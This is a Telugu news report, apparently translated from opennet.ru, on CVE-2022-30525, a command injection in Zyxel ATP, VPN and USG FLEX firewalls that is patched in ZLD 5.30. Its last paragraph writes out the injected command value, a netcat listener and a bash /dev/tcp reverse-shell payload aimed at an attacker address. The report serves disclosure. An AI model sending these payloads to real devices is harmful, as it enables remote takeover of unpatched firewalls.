ATP, VPN మరియు USG FLEX సిరీస్ల యొక్క Zyxel పరికరాలలో క్లిష్టమైన దుర్బలత్వం (CVE-2022-30525) గుర్తించబడింది, ఇది ఫైర్వాల్లు, IDS మరియు VPNలను ఎంటర్ప్రైజెస్లో నిర్వహించడానికి రూపొందించబడింది, ఇది బాహ్య దాడి చేసే వ్యక్తిని కోడ్ని అమలు చేయడానికి అనుమతిస్తుంది. ప్రమాణీకరణ లేకుండా వినియోగదారు హక్కులు లేని పరికరం. దాడిని నిర్వహించడానికి, దాడి చేసే వ్యక్తి తప్పనిసరిగా HTTP/HTTPS ప్రోటోకాల్ని ఉపయోగించి పరికరానికి అభ్యర్థనలను పంపగలగాలి. Zyxel ZLD 5.30 ఫర్మ్వేర్ అప్డేట్లో దుర్బలత్వాన్ని పరిష్కరించింది. షోడాన్ సేవ ప్రకారం, HTTP/HTTPS ద్వారా అభ్యర్థనలను ఆమోదించే గ్లోబల్ నెట్వర్క్లో ప్రస్తుతం 16213 హాని కలిగించే పరికరాలు ఉన్నాయి.
వెబ్ హ్యాండ్లర్ /ztp/cgi-bin/handlerకి ప్రత్యేకంగా రూపొందించిన ఆదేశాలను పంపడం ద్వారా ఆపరేషన్ నిర్వహించబడుతుంది, ప్రామాణీకరణ లేకుండా యాక్సెస్ చేయవచ్చు. lib_wan_settings.py లైబ్రరీలో ఉపయోగించబడుతుంది మరియు setWanPortSt ఆపరేషన్ను ప్రాసెస్ చేస్తున్నప్పుడు అమలు చేయబడిన os.system కాల్ని ఉపయోగించి సిస్టమ్పై ఆదేశాలను అమలు చేస్తున్నప్పుడు అభ్యర్థన పారామితుల యొక్క సరైన క్లీనప్ లేకపోవడం వల్ల సమస్య ఏర్పడుతుంది.
ఉదాహరణకు, దాడి చేసే వ్యక్తి "; పింగ్ 192.168.1.210;" ఇది సిస్టమ్లో "పింగ్ 192.168.1.210" కమాండ్ అమలుకు దారి తీస్తుంది. కమాండ్ షెల్కు యాక్సెస్ పొందడానికి, మీరు మీ సిస్టమ్లో “nc -lvnp 1270”ని అమలు చేయవచ్చు, ఆపై 'తో పరికరానికి అభ్యర్థనను పంపడం ద్వారా రివర్స్ కనెక్షన్ని ప్రారంభించవచ్చు; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
మూలం: opennet.ru